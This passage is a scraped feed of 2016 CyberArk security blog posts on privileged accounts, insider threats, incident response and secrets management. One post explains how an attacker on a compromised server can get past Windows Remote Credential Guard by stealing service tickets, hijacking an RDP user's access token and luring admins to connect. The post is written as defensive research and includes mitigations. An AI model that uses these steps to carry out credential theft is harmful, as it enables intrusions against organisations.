This can have a direct business impact, resulting in mistakes and missed opportunities, wasted money and lost income. But beyond these immediate losses are the broader problems of public confidence and brand reputation. A company that does not effectively serve its market can lose the confidence of its customers, resulting in long-term damage to its brand.

Legally, data integrity is necessary for non-repudiation—the ability to ensure the authenticity and accuracy of agreements and transactions. It also is required by government and industry regulations, including the federal Health Insurance Portability and Availability Act (HIPAA) and the Payment Card Industry Data Security Standards (PCI DSS).

The issue of data integrity has recently come to the forefront in the public sector with concerns of possible foreign tampering with U.S. election systems. These concerns resulted in a warning from the Department of Homeland Security and the Director of National Intelligence, urging “state and local election officials to be vigilant and seek cybersecurity assistance from DHS,” to ensure the integrity of election data.

Ensuring integrity

A powerful tool in ensuring data integrity is hashing—using a cryptographic algorithm to reduce a file or data element to a short string of numbers called a hash or a message digest. Done properly, this message digest is unique to the piece of information being hashed, so any change in the data will produce a completely different digest. A comparison of digests from a Secure Hash Algorithm (SHA) will immediately indicate any change in the data.

NIST last year approved a new hash standard, SHA-3, a “next-generation tool for securing the integrity of electronic information.” The new algorithm did not replace the existing SHA-2 algorithm, which appears to have years of life left in it, but is a backup put into place against the day SHA-2 becomes vulnerable to attacks. The SHA-1 algorithm no longer is recommended for use.

Basic cyber security practices, including encryption, monitoring and access control, also can help to ensure the integrity of data in your systems.

Encrypting data at rest and in transit makes it less susceptible to alterations. It would be difficult if not impossible for an adversary to modify ciphertext in a way that would not be readily apparent when decrypted. Appropriate access control policy and enforcement can help to keep adversaries away from the data, and network monitoring can identify suspicious activity as it happens, and provide a trail if a breach is detected.

The bottom line is, good cyber hygiene should include the integrity of data as well as its confidentiality and availability. Is it time for your organization to have a cyber hygiene check up?

]]>
Cyber Security Nightmares https://www.cyberark.com/blog/cyber-security-nightmares/ Tue, 01 Nov 2016 19:34:46 +0000 https://www.cyberark.com/blog//

Cyber attackers pose a number of “scary” situations for IT security professionals. Attack vectors change, new threats emerge and staying on top of best practices can be a challenge.  In the CyberArk Global Advanced Threat Landscape Survey 2016, respondents were asked which cyber attacks or tactics were the most concerning for their organizations in the next 12 months. Considering the recent Dyn attack and other headlines, the results of that question were spot on: Distributed denial-of-service (DDoS) attacks (19 percent), phishing (14 percent), ransomware (13 percent), privileged account exploitation (12 percent) and perimeter breaches (12 percent).

The security industry understands the value of working together for the advantage of the greater good.  This is particularly important as we read about “amateurs” who have effective tactics thanks to a matrix of connected devices. Security professionals have to stay ahead of the curve, and the bar is continually moving higher. This requires prioritizing time and security initiatives.

CISOs and others certainly value sharing their experience and learning lessons from others. In the spirit of Halloween, here are three dark tales about companies that recently experienced horrifying cyber attacks—all through the exploitation of privileged accounts.

The Bone-Chilling Bangladesh Bank Heist

In February 2015, after breaking through the bank’s IT perimeter by using malware, cyber criminals captured administrator privileged credentials from infected machines. Using these stolen credentials, they moved laterally throughout the environment until they reached SWIFT, a financial services co-op that provides a secure network through which banks can send and receive monetary transactions. After commandeering SWIFTNet systems, the attackers proceeded to order a total of 35 transactions worth $951 million. Approximately $81 million was transferred before a spelling error raised suspicion that led to the discovery of the breach. To this day, the money remains unrecovered.

The Sinister Ukraine Power Shutdown

On December 23, 2015, 225,000 residents throughout western Ukraine lost electricity and the IT and OT systems belonging to two of the region’s utility providers were destroyed. This unprecedented cyber attack began when attackers sent spear phishing emails to IT systems administrators at the impacted utility companies; three individuals fell victim. With the click of a button, the attackers gained the inside access needed to exploit legitimate users, gain access to privileged accounts, and ultimately destroy systems and shut off electricity throughout the region—leaving thousands in the dark.

The Horrible OPM Breach

In 2014, alleged nation state attackers compromised a third-party contractor hired to conduct background checks on behalf of the U.S. federal government. The purpose of this “secondary” attack was to gain trusted access into the Office of Personnel Management (OPM) network. The attackers succeeded in their mission, breached the OPM network, escalated privileges and ultimately located and exfiltrated their desired data. Nearly a year after the attack on the contractor, OPM discovered that it had fallen victim to a large-scale, targeted data breach that resulted in the theft of highly personal information on 21.5 million current and former employees and contractors. Talk about a nightmare.

Privileged account security—or the lack of it—is a major factor in nearly every headline-grabbing cyber attack today. Businesses that fail to prioritize the security of their privileged accounts are at risk of becoming victims—which can mean significant damage to business, reputation and even the ability to operate. Download our free guide highlighting five top reasons to prioritize privileged account security….before it’s too late.

 

]]>
Infographic: Insider Threats Exceed Malicious Intentions https://www.cyberark.com/blog/infographic-insider-threats-exceed-malicious-intentions/ Wed, 26 Oct 2016 14:03:43 +0000 https://www.cyberark.com/blog//

The SANS Institute recently found that nearly a third of all organizations still have no capability to prevent or deter an insider incident or attack. Further, only nine percent of surveyed companies ranked their insider threat prevention methods as very effective. Yet as recent headlines show, the insider threat is very real and cannot be ignored.

To protect against insider threats, organizations must first understand—and identify— what the threat is. Our newly released eBook uncovers common misconceptions about insider threats, illustrates how these threats have manifested in real-world situations and provides new insight to help organizations reduce risk across four main categories:

  • Exploited Insiders: These are high-value employees specifically targeted by external attackers, usually via phishing. Attackers target employees to gain a foothold inside an organization.
  • External Insiders: Did you know that by 2017, 41 percent of workers will be temps, contractors or consultants? Just like employees, these external “insiders” are also a target exploited by cyber attackers.
  • Malicious Insiders: While accounting for only 26 percent of insider attacks, malicious insiders, such as disgruntled or angry employees, are the source of some of the most costly and difficult attacks to detect.
  • Unintentional Insiders: Most employees are just trying to do their jobs well—yet poor security habits too often put systems at risk.

This infographic details recent industry findings and statistics on insider threats, and highlights how insiders across all four categories can use privileged access to cause intentional or unintentional damage.

For additional information on the topic, read our eBook for details about insider threats and gain guidance on how your organization can contain and detect these attacks.

cyberark_insider-threat-_final_102616

]]>
Judgment Day Cometh with the Rise of the Machines, or What I Learned at PuppetConf 2016 https://www.cyberark.com/blog/judgment-day-cometh-with-the-rise-of-the-machines-or-what-i-learned-at-puppetconf-2016/ Mon, 24 Oct 2016 11:30:00 +0000 https://cyberarkvx2.wpengine.com/blog/judgment-day-cometh-with-the-rise-of-the-machines-or-what-i-learned-at-puppetconf-2016/  

“In the future, all software will be installed, configured, and managed by software.”

So said Luke Kanies, Puppet’s founder, during his keynote at his company’s annual conference in San Diego last week.  Puppet is a leading configuration management and server automation software company, and they’re an awesome partner of ours here at Conjur.

That vision that Luke laid out is one that we share.  But it also conjurs up (groan!) dystopian paranoia embodied by the future envisioned in the Terminator movies where software (in the form of Skynet) is taking over the world and eliminating humanity in the process.  Last week’s massive DDoS attack on Dyn that featured hacked web cams, baby monitors, and home routers feels like it might be the first step down a slippery slope.  How do we ensure we don’t go there?

The trend towards code managing code is nothing new, but the transformation of the way we are building and deploying applications these days is causing that trend to accelerate.  One of the most impactful slides from Luke’s keynote was this one:

IMG_1842-215470-edited.jpg

The key point he was making was that as we move from physical servers to virtualized machines to containers, there is an exponential increase in complexity driven by the growth in the number of “entities” that need to be managed and the dramatic decrease in the life span of these entities.  With bare metal servers, there is a single entity to be managed and it typically lasts for three years.  Assuming you have 100 servers to manage, there are 100 “things” or “entities” to be managed over a 3-year period.  With VMs, assume there are 10 VMs per machine, and each one lasts 1 year.  Do the math, and you’ll find that means there are 3,000 entities to be managed over a 3-year period.  As we move to the container era, the life span of those entities can be on average a single second according to a recent survey released by New Relic.  And when you layer in the much greater density of containers (10 per VM, and 10 VMs per machine), the resulting number of entities that need to be managed over a 3-year period explodes to almost 16 billion.  It seems obvious that the ways in which we’ve managed servers — both the processes and tools — will need to be radically overhauled given the massive increase in complexity brought on by the container era.

Only software-based automation can keep pace with a management challenge of this magnitude, and that’s why companies like Puppet are seeing such dramatic growth in their adoption.  But as we increasingly delegate the management of code to code, questions of trust must be answers.  While we’re still far from the dark future envisioned in Rise of the Machines, how can we be sure that our approaches to security keep pace with the massive expansion in management complexity we are facing?

Part of the answer will come from automated management of the secrets that code relies on to stay secure while accomplishing its mission.  Security policies defined by people in products like Conjur can be used to automatically and continuously manage secrets across huge numbers of entities, all the while providing the necessary logging, alerting, and reporting needed to provide transparency to managers.

Beth Cornils, Puppet’s Senior Product Manager and Verne Lindner, Senior UX Designer, delivered a great Puppet security roadmap session at the conference during which she described how Conjur and Puppet can be used in conjunction to fuse high levels of automated security management with automated management large scale infrastructure.

image2-1-018044-edited.jpg

If you’re interested in learning more about integrating automated secrets management with devops efforts, check out our white paper on the topic (registration required) or read up on Conjur’s integration with Puppet.  Or ping us for a demo if you’re interested in moving beyond hiera-eyaml and seeing how Puppet and Conjur work together in the real world to deliver a stronger security solution for our joint customers.  We were blown away by the positive energy at PuppetConf and the enthusiasm of many larger, more mature Puppet customers for what Conjur has to offer.  Let’s keep the machines in their place by working together.

Terminator-3-Rise-Machines-Timeline-Explained-520222-edited.jpg

 

]]>
Infographic: Why Privileged Account Security Must be a Top Priority https://www.cyberark.com/blog/infographic-privileged-account-security-must-top-priority/ Fri, 21 Oct 2016 20:25:29 +0000 https://www.cyberark.com/blog//

Make no mistake, your organization is a target – do you have an effective security program in place to detect and contain the damage of an attack? With nearly daily headlines about cyber attacks, it’s imperative that organizations understand the role privileged accounts play in the attack life cycle.  If privileged credentials are not properly managed and protected, business leaders should be prepared to deal with the aftermath of a crippling breach.

Consider the role of privilege in the following scenarios:

  • Insider Threats: According to industry reports, it takes about 146-170 days to detect an in-progress attack. That’s plenty of time for a malicious insider with access to authorized, privileged accounts (or an external attacker that appears as a legitimate insider) to do real damage.
  • Ransomware Attacks: For many reasons, phishing is a popular attack strategy, and often the phishing emails that target employees with direct (or indirect) access to privileged accounts contain sophisticated malware, such as ransomware.
  • Cloud Adoption: The fast-paced migration to the cloud and surge in automation tools comes with an increasing number of privileged accounts within IT infrastructures. This expands the potential attack surface exponentially.

These are just a few reasons why the first and most critical step in executing an effective, layered defense is to prevent the theft and exploitation of privileged credentials—across endpoints, servers and domain controllers, on-premises or in the cloud. Without these credentials, an attacker’s ability to move across the network is blocked. And if you block privilege escalation, you block the attack.

Check out our infographic for more information on the role of privileged accounts in the attack lifecycle, and learn why now is the time to give privileged account security the priority it deserves.

 

]]>
“No more Pass-the-Hash” – Exploring the limitations of Remote Credential Guard https://www.cyberark.com/blog/no-pass-hash-exploring-limitations-remote-credential-guard/ Tue, 18 Oct 2016 19:05:39 +0000 https://www.cyberark.com/blog//

Remote Credential Guard was recently introduced by Microsoft to mitigate the risk of credential theft from machines that are accessed through RDP. In essence, this feature enables RDP connections without leaving credentials on target servers. Instead, the credentials remain on the source machine and the target requests Service Tickets from the source as needed.

While a useful control, an attacker can still reside on a target machine, wait for an incoming connection, and instead of hijacking the credentials, simply request the tickets he wants from the source. Thus, even without having the credentials, as long as the session is open, the adversary can impersonate the privileged user (ex: by stealing the generated service tickets or hijacking the victim’s access token).

This blog will explore some of the ways this attack vector can be executed.

The Remote Credential Guard

Last year, Microsoft introduced the Credential Guard – a security feature in Windows 10 Enterprise and Windows Server 2016. Credential Guard uses virtualization technology to mitigate the risk of derived domain credentials theft after compromise, thus reducing the effectiveness of Kerberos attacks such as Overpass-the-Hash and Pass-the-Ticket. Recently, Microsoft released the Anniversary update and, with it, the Remote Credential Guard, a security feature that aims to protect credentials over Remote Desktop (RDP) connections by generating the necessary service tickets from the source machine instead of by copying the credentials (hashes and TGTs) to the target machine.

rdc-imageSource: https://technet.microsoft.com/en-us/itpro/windows/keep-secure/remote-credential-guard

This feature is designed to allow administrators to safely connect to untrusted remote servers (“assume breach“) without leaving privileged credentials on those servers. It seems to be replacing the Restricted Admin mode, a feature introduced in Windows 8.1  / 2012 R2 and then “back-ported” to Windows 7 / 8 / 2008 R2 / 2012. Restricted Admin mode aimed to secure privileged credentials by “switching” the RDP session to a local admin session, thus preventing the theft of privileged domain credentials. The key advantage of the Remote Credential Guard in comparison to the Restricted Admin mode is that the RDP connection is fully interactive (instead of network logon), allowing access to remote services from the credentials-free RDP session.

When a user logs in via RDP to a machine that has Remote Credential Guard enabled, none of the Security Support Providers (SSP) in memory store the user’s clear-text password or password hash. Thus, if an attacker has compromised the target machine and tries to dump the hashes, there will be no hashes there to dump.

1-hashes

This eliminates an attacker’s ability to execute Pass-the-Hash or Overpass-the-Hash (aka Pass-the-Key) attacks to impersonate the remote user. So, is this the end of credential theft attacks?

Service Tickets are still there

Note that Kerberos tickets still remain in memory to allow interactive (and SSO) experiences from the target (RDPed) server.  Dumping the cached Kerberos tickets from memory shows that the session key of the Ticket Granting Ticket (TGT), which has been delegated from the client machine’s Credential Guard, is encrypted making it unusable for a Pass-the-Ticket attack.

2-tickets

However, because service tickets (Ticket Granting Service) are not encrypted, it is still possible to pass them to gain access to specific services (SPN). The scope of access and the escalation opportunities here depends on the service tickets that can be extracted.

The target server will withdraw any service ticket requested by the user through the source (RDPing) machine. If the RDP session involves execution of administrative tasks or access to sensitive assets, it will probably cache juicy service tickets that could be abused for remote execution and data exfiltration. So, while it is true that password hashes and TGTs have broader exposure, and thus are more sensitive than service tickets, those service tickets can be quite valuable in their own right.

Nevertheless, service tickets are limited. What if the attacker is not satisfied with what he got and wants to access to other, more lucrative targets? After all, while the account of the victim may have the adequate permissions for escalation, relying on the user to request the service tickets that enable effective elevation may not work.

Borrow the Access Token

Well, despite the fact that the victim’s credentials are isolated by Credential Guard on the source machine, the victim account’s access token still exists on the compromised server as long as the RDP session is live. Hijacking this access token allows an attacker on a compromised server to run code in the context of the victim’s account. Even though the victim’s TGT is protected, the Remote Credential Guard will redirect any Kerberos requests back to the source machine, and the source machine will be tricked into granting service tickets.

3-token-elevationService tickets will be generated and permissions will be granted for both the RDP client’s token and the malicious duplicated token based on the authenticated account privileges. Even if the attack window is narrow, it is possible to quickly request arbitrary tickets on behalf of the victim and use them later on another machine. By default, the lifetime of service tickets is 10 hours, leaving enough time for the attacker to plan the next move.

Timing or skills

The mentioned attack vector requires two pre-requisites: a machine with administrative access and a user who is logged on (or logged on recently) to that compromised server. The former could be achieved by exploiting a vulnerability or abusing a misconfiguration, while the latter will demand social engineering or a bit of luck. The first thing to do after compromising a server is to check whether an active terminal session or cached Kerberos tickets exist. If there are no credentials and time is not an issue, it’s possible to reside on the machine and wait for incoming connections. Or perhaps use the old fashioned trick and encourage such a connection by luring an admin to RDP to the machine by creating an issue that requires higher privileges to resolve.

Summing it all up

The Remote Credential Guard is designed to protect privileged domain credentials from being exposed when connecting to a remote server with RDP, yet derived credentials are not limited to NTLM hashes and Kerberos TGTs. From the attacker’s perspective, the quantity of compromised credential derivatives are irrelevant if one of them allows the sufficient level of access. While limiting the potential exposure of credentials to some extent, the Remote Credential Guard does not fully mitigate the risk of credentials theft by a determined adversary that has already compromised the target machine and is just waiting for a privileged session to fall under the fishing rod.

Recommendations

Given the limitations of Remote Credential Guard, what else can be done to protect derived credentials from theft? Here are a few steps you can take and policies you can enforce to close some of the gaps that are left open by Remote Credential Guard:

  • Establish remote connections using network logon instead of interactive logon when possible
  • Set up and restrict administrative access by tiers (Tier Model), i.e Forest/Domain Admin are only used to administer the Active Directory
  • Reduce credentials exposure to the least privilege required for the specific task
  • Enforce credential removal after logoff

 

]]>
The Other Insider Threat https://www.cyberark.com/blog/the-other-insider-threat/ Thu, 13 Oct 2016 18:50:00 +0000 https://www.cyberark.com/blog//

The trusted insider has always been a security risk – whether an executive with access to sensitive information or an administrator on an enterprise network. According to a recent report from the Ponemon Institute, 56 percent of security practitioners surveyed said that company insiders are the primary cause of security breaches and 72 percent were not confident they could control employee access to sensitive information.

We have written recently in our blog about the threat of malicious insiders. But it is not only the malicious you need to worry about – don’t underestimate the threats posed by human error and good intentions.

To err is human

According to IBM, human error was found to be a contributing factor in more than 95 percent of incidents investigated. The most common problems included system misconfiguration, poor patch management, using default settings and weak passwords, lost devices and sending sensitive data to the wrong e-mail address. This data is now two years old, but these examples of errors are still typical today.

Some of these problems are the result of the individual’s poor decision or a slip of the mouse. It could be something as simple as clicking “reply all” on an e-mail. Some, however, are the result of poor policy or poor management. System configurations and patch management should be matters of organizational policy and should be periodically assessed.

We will never rid ourselves completely of mistakes, but there is vast room for improvement.

The path to poor security is paved with good intentions

Most employees are hard-working and want to do a good job. In fact, many go out of their way to do their jobs efficiently, and that can pose a problem. It is not uncommon for employees to install unauthorized wireless access points to make it easier to connect to the network throughout the office. These points can improve productivity and worker satisfaction, but unknown and unmanaged by administrators, they also create security holes that can be used by attackers to gain access.

Studies consistently show that workers also regularly connect remotely to work networks using personal devices – mobile phones, tablets, laptops and home PCs. Too often this is done from unmanaged devices in violation of organizational policy. The workers mean well, but the result can be gaping holes in network defenses.

Workers often see security as a roadblock rather than an enabler. When this happens, they will find ways around policy in order to do their jobs more easily and become insider threats.

The unwitting accomplice

Honest insiders also are targeted by malicious outsiders through using social engineering. E-mail phishing (and spear-phishing to target high-value individuals) is one of the most common types of social engineering, but examples range from simple phone calls to carefully crafted Web sites hosting malicious content.

Insider threats do not stop with your employees. Contractors, business partners and links – both upstream and down – in your supply chain all present threats that can be used to compromise your network from the inside.

Protecting yourself

The first line of defense against the well-intentioned insider is awareness and training. All employees should be educated to understand the risks, organizational policies and the reasons for those policies. However, the basic rule in defending against both well-intentioned and malicious insiders is to address the threat, not the individual.

You can find more detailed information on detecting and reducing insider risks in the CyberArk ebook, “The Danger Within: Unmasking Insider Threats.” Addressing the insider threat requires a combination of proactive protection and threat detection including:

  • Using least privilege access to limit potential accidental or intentional damage
  • Controlling applications to reduce the risk of users becoming exploited
  • Telling users that their actions will be monitored to deter unauthorized behavior
  • Monitoring user and account activity to detect threats on the inside – be it from malicious or exploited insiders

Learn more about how the CyberArk Privileged Account Security Solution helps organizations to limit user privileges and control access to reduce the risk from insiders on our website.

]]>
Déjà vu: Malicious Insider Puts NSA Back in the Spotlight https://www.cyberark.com/blog/deja-vu-malicious-insider-puts-nsa-back-spotlight/ Fri, 07 Oct 2016 18:33:14 +0000 https://www.cyberark.com/blog//

Just three short years after NSA contractor Edward Snowden brought insider threats to the forefront, the agency has once again made headlines. News broke this week that a former NSA contractor—employed by the consulting firm Booz Allen—was recently arrested and is being investigated by the FBI for potentially stealing top-secret computer code used to hack into foreign government networks. The New York Times has full details.

Despite significant increases in cyber security awareness, as well as new rules detailed in the National Industrial Program Security Operating Manual (NISPOM) that charge contractors to establish programs to identify personality indicators of malicious insider threats, government agencies and private sector organizations alike haven’t learned their lessons and are failing to employ security basics designed to unmask insider threats.

Though malicious insiders account for fewer incidents than unintentional insiders, malicious inside attacks are the most difficult to detect and carry the highest costs when compared to other non-malicious breach types. It makes sense—your trusted employees don’t fit the “typical profile” of an attacker, so they can often operate stealthily under the radar for long periods of time.

Third-party contractors add another layer of complexity: Because they are not fully controlled and managed by your organization, it can be especially difficult to secure all of these users and their endpoints. For example, external users can easily share privileged account credentials used to access sensitive information, or technology vendors can embed privileged accounts in the systems they manufacture—all without your knowledge or permission.

Why Insiders “Go Rogue”

When it comes to malicious insiders, there a few common motivations that are seen across a wide variety of attackers. Many malicious insiders are simply frustrated or angry; they often feel as if their employer or manager has done something wrong. Others are motivated by financial reasons. Others are similar to hacktivists, in that they are motivated by political and personal beliefs. Still others may be influenced by an outside party, such as a crime ring or nation-state that is using blackmail to coerce behavior.

To effectively protect against both malicious and non-malicious insider threats, organizations must first understand what the insider threat truly is. Our new eBook, The Danger Within: Unmasking Insider Threats, outlines the who, what, why and how of the insider threat to expose risks you may not be considering, and provides guidance to help prevent and detect these potentially damaging and costly attacks.

Download it here: https://www.cyberark.com/resource/danger-within-unmasking-insider-threats/

]]>
Five Operational Benefits of Securing Privileged Linux Accounts https://www.cyberark.com/blog/five-operational-benefits-securing-privileged-linux-accounts/ Thu, 06 Oct 2016 19:11:55 +0000 https://www.cyberark.com/blog//

When talking with Unix and Linux teams about securing privileged and root access, the first question sysadmins typically ask is, “Is this going to make my job more difficult?”

In keeping business critical applications running, Unix and Linux teams are essentially tasked with keeping the business running. Anything that interferes with this effort or complicates workflows can simply be considered unacceptable. Given the common perception that increased security means painful operational tradeoffs, it’s no surprise that sysadmins are skeptical of new tools. However, not all security tools are created equally.

Despite popular belief, security does not always have to come with painful tradeoffs. Many privileged account security solution end users, particularly in Unix and Linux environments, have been able to use the automation provided by the solutions to simplify IT operations processes. With the operational gains they’ve experienced, some have been able to free up time – ranging from hours to weeks – enabling them to focus their efforts on more important or interesting projects.

If your organization is considering privileged account security but you’re concerned about how this type of solution may impact your day-to-day job, read the five benefits below that have been shared with us by Unix and Linux admins who are also CyberArk users.

Five day-to-day operational benefits that CyberArk customers have experienced:

  1. Less effort to track credentials. When users manually keep track of their credentials, they can easily be lost or forgotten. One end user actually reported that he kept all his passwords in his wallet, because it was the only way he felt they would be safe. With the Privileged Account Security Solution, users no longer need to keep track of their own credentials. Instead, users need only keep track of one credential – their CyberArk credential – and everything else is managed for them.
  2. Less time spent managing credentials. Automated password management capabilities can help to eliminate manual, time consuming processes. One CyberArk user reported that the CyberArk Privileged Account Security Solution enabled him to take on more work because it reduced the time he spent managing passwords by 20-25 percent.
  3. Less time creating and deleting accounts. When admins join or leave the Unix/Linux team, there is no simple way to create or remove local user accounts on each individual system. A customer reported that in his environment of 4,000 Unix servers, it took a full month to provision access each time a new employee joined the team. Once the CyberArk Privileged Account Security Solution was in place, the account provisioning and de-provisioning process was automated, reducing this one month of effort to just a few minutes.
  4. Less time spent managing least privilege controls. Admins tasked with managing sudo policies often find this tool frustrating. Instead of applying policies across all systems, they have to be applied one-by-one to each individual Linux and Unix system. The CyberArk Privileged Account Security Solution helps Unix/Linux admins to centrally manage and update least privilege policies for users across all managed systems. This eliminates the highly repetitive effort of updating policies on each system, saving time and effort and enabling admins to focus on more interesting work.
  5. Less risk of broken processes related to password changes. One customer had a web application that needed to access a database during certain ecommerce transactions. The database password was embedded into the application code for reliability, but to meet PCI DSS requirements, the password needed to be changed every 90 days. One error could result in immediate lost revenue for the company. With the CyberArk Privileged Account Security Solution, the customer was able to centrally manage the database password and ensure that the password change was seamlessly propagated to all dependent applications and services without taking on the risk of broken processes – and without risking revenue with every password change.

Learn more about the how CyberArk solutions help customers to balance security and operational priorities in Unix and Linux environments, while simplifying the day-to-day tasks for end users.

]]>
Effective Cyber Security Response: Test & Communicate Your Plan https://www.cyberark.com/blog/effective-cyber-security-response-test-communicate-plan/ Tue, 04 Oct 2016 19:50:06 +0000 https://www.cyberark.com/blog//

Organizations plan for success. They should also plan for worst case scenarios – especially in the case of a cyber attack or breach. For many organizations, preparedness means developing plans for disaster recovery and continuity of operations.

As the cyber threat landscape has evolved, incident response no longer is the sole responsibility of IT. Every organization is targeted by adversaries, and some compromise is inevitable. Data breaches or other incidents have an impact on more than just the information or technology infrastructure — they can impact the ability for a business to operate.

As noted in the recently released “CyberArk Global Advanced Threat Landscape Survey 2016,” many organizations have adopted a “post-breach” mindset, meaning they operate under the presumption of a breach and have developed post-breach response plans. The realities of today require this proactive mindset. In the survey of 750 IT and IT security decision makers, 95% of respondents reported their organization has a cyber security emergency response plan. That’s relatively good news. However, digging below the surface we also learned:

  • Less than half (45%) of respondents reported the plan has been communicated and is regularly tested with all IT staff
  • Four in ten (40%) state that their organization’s plan has only been communicated and regularly tested with senior IT staff.

If an incident occurs, does the PR team have a media outreach strategy in place? How will you notify customers? How will HR handle employee communications if email and intranet services go down? Are inside sales and service teams trained to handle outbound customer communications?

There are many considerations to make. At a minimum, incident response planning should address the following:

Who is in charge?

A strong cyber security response plan requires clearly defined roles and responsibilities, including empowering a strong leader and decision-maker. Many organizations default this responsibility to the chief legal counsel, but crisis experts note that although lawyers should be available to advise, they are not the best choice to lead the response.

Effective incident response requires organizational and administrative abilities as well as technical knowledge – if not hands-on technical skills. The choice of this leader can vary depending on the organization and the personnel available, but it should be someone with an understanding not only of the IT systems but also how they support your organization’s mission and business operations. The CIO or CISO might be a good place to start in some organizations. Post-breach, clear lines of communication are required for prompt and decisive actions. Determine this in advance.

A documented response plan will cover how your organization will work with the primary response team for data recovery, continuity of operations and forensics. It will lay out responsibilities and roles and help to ensure effective decision making in crisis mode.

Test, Adapt and Test Again

A static “shelfware” plan will not address your incident response needs. This is particularly true as the threat landscape continues to evolve. It is critical to battle-test readiness through live drills to help prevent company paralysis when a data breach or other incident occurs. Drills can help to uncover deficiencies in planning and implementation, so that plans can be updated as needed.

Periodic testing and updating is necessary to keep your incident response plan effective. Having a documented and evaluated incident response plan demonstrates to customers and regulators that your organization is taking responsible steps to anticipate and mitigate the risk of threats.

Are you prepared? Attackers will get inside the network, and they will operate undetected for months by impersonating authorized users. An important part of planning also involves taking a proactive, layered approach to security (which we regularly advocate to our customers), while ensuring security best practices are part of your organization’s DNA.

For more information about the gaps in security awareness and preparedness, read CyberArk Global Advanced Threat Landscape Survey 2016

]]>
Scaling security: 4 million secrets per minute https://www.cyberark.com/blog/scaling-security-4-million-secrets-per-minute/ Fri, 30 Sep 2016 17:06:00 +0000 https://cyberarkvx2.wpengine.com/blog/scaling-security-4-million-secrets-per-minute/  

What’s your cloud reboot preparedness? Whether it’s a disaster recovery scenario or applying a critical update, restarting your cloud infrastructure will need to happen fast, and it will require access to security credentials, possibly millions of them. You don’t want your security architecture to fail under the workload.

Conjur’s security software helps automate the identity, access management and secrets systems for cloud infrastructure, and we’ve put a lot of thought into scalability over the years. Scaling secrets management to work fast in the cloud restart scenario is hard because:

  • There are so many types of secrets (passwords, API keys, SSH keys, etc.), with different rules and permissions attached to them.
  • Permissions have to be checked to ensure secrets go out to the right places, and not the wrong ones.
  • An audit trail of all requests (successful or not) must be logged.
  • The requests for credentials often come from software that is distributed across multiple cloud data centers, platforms, or regions.

Here’s a customer use case that puts the challenges and solution in perspective for security architects.

The customer use case: “1.5 million secrets, please”

The customer is the developer of an on-line system with millions of simultaneous, interactive users. Their cloud restart involves simultaneously re-authenticating and re-authorizing 10,000 secure hosts, each of which must re-fetch all the “secrets” (e.g. API keys, SSH keys, passwords, etc.) that it needs–about 150 secrets per host, or 1.5 million secrets in all. The requests are all issued at the same time by their configuration management system (Salt), and the credentials are used by those hosts to connect to the services and data sources  across their infrastructure.

A distributed approach to scaling secrets management

Master-follower-architecture.pngTraditionally, secrets are kept and accessed via a centralized vault. In a situation like the one our customer faces, this can become a scalability bottleneck or a single point of failure.

Conjur takes a an alternative approach, and runs as a tree of distributed, replicating servers. A Conjur “master” is updated with new identities, roles, permissions and data, which it replicates in real time to one or more “followers.” Each Conjur follower provides read-only API access to services, such as permission checks, distributing public keys, and granting access to secrets. Each follower also continuously generates audit records of system activity, which it transfers back up the master. Followers are deployed as widely as the overall infrastructure: across multiple data centers, cloud providers, and cloud regions. This improves reliability and network latency by co-locating followers with client machines.

Because each follower has a complete copy of the data, followers can be used to very efficiently “scale out” the overall capacity. Load balancers can be deployed in front of the followers for efficient routing and health checks.

Customer benchmarks

Our customer ran benchmarks of their restart scenario. The results of the benchmarks, running a cluster of 3 Conjur followers on bare-metal servers (24 cores each), were as follows:

  • They achieved 218 authentication requests and 218 simultaneous batch secret fetches (150 secrets per batch) per Conjur follower, that’s 32,700 secrets served at once per follower.
  • Average response latency is about 5 seconds, so the auth+fetch cycle can be repeated every 5 seconds, serving up 392,000 secrets per minute per Conjur follower.
  • During the benchmark, access permissions for each secret request were validated and an audit trail kept.
  • Since Conjur is horizontally scalable, they plan to simply add 7 more followers in production. 10 Conjur followers will provide fault tolerance, and a total capacity of about 320,000 secrets every 5 seconds, which comes to ~4 million requests per minute.

On top of database, app logic, and networking, secrets management is one more scalability concern to tackle in the cloud. It’s a hard challenge, but highly rewarding when done right.

 

]]>
Your Security Systems Need to be Secure https://www.cyberark.com/blog/security-systems-need-secure/ Mon, 26 Sep 2016 21:33:58 +0000 https://www.cyberark.com/blog//

According to a variety of industry reports, cyber security spending is measured in Billions of dollars, and it’s projected to grow – driven by a number of market factors including cloud, mobile, IoT and other “elements of digital business.”

But as organizations move quickly to shore up their security systems, motivated attackers continue to innovate and evolve their tactics just as rapidly. From sophisticated phishing attacks, software flaws and reverse-engineering, to protocol analysis, misuse of cryptography, side-channel attacks and even attacks on physical security measures, attackers often have little trouble getting into an organization’s network. Remember – attackers are patient – always looking for a crack to enter enterprise networks.

This is one reason why layered security is critical – ideally including proactive controls such as encryption and detection systems to identify malicious behavior. Yet security systems can be largely ineffective without privileged account security in place as a safeguard.

Think of it this way: privileged accounts are embedded within every piece of security, database and network technology – used for installation and management. As such, they represent a gateway into your organization’s most valuable assets. If you deploy a million dollars’ worth of next-gen firewalls but don’t secure their privileged accounts, an attacker can obtain those credentials and go right through your firewall. Attackers are experts in spotting “cracks,” including small vulnerabilities that only exist for a few hours. Even the smallest “crack” of one stolen credential can be enough to make your million-dollar firewall investment nearly worthless—or worse, take down your entire organization.

Today’s reality is that the IT infrastructure is not fully protected unless privileged accounts and their credentials (accessed by both humans AND applications) are secured.

To maintain the credibility and efficacy of your security solutions, put privileged account security in place before you deploy any other security controls or detection solutions. For other reasons to prioritize privileged account security today, download our new At-a-Glance Guide.

 

]]>
Five Reasons Why It’s Time to Put Privilege First https://www.cyberark.com/blog/five-reasons-time-put-privilege-first/ Fri, 23 Sep 2016 20:30:53 +0000 https://www.cyberark.com/blog//

For more than a decade, CyberArk has focused on helping companies to protect high value assets inside the network. Over the years, privileged account security has evolved from compliance-driven projects to thoughtful strategic programs adopted enterprise wide.

Along the way, we have innovated and enhanced our offering to stay ahead of ever-changing advanced threats, but our focus remains on helping our customers to proactively protect privileged accounts. Today our platform delivers new a layer of security inside the network – designed to help organizations build and maintain trust in their IT systems and protect what matters. This is not only our mission, it’s our passion. Working closely with customers and educating the market about best practices is not only important, but essential for the entire business community. Best practices are not static –they advance as new insights are available. We listen, observe, collaborate and advise as threats emerge and evolve.

CyberArk works with security teams at companies in virtually every industry, and there is a growing recognition that privileged account security must be a top priority. Cyber attack headlines extend well beyond hospitals, government and financial institutions. All organizations have valuable assets – data about employees, customers, IP, financial information – and all organizations have privileged accounts that need to be secured in order for those assets to be protected.

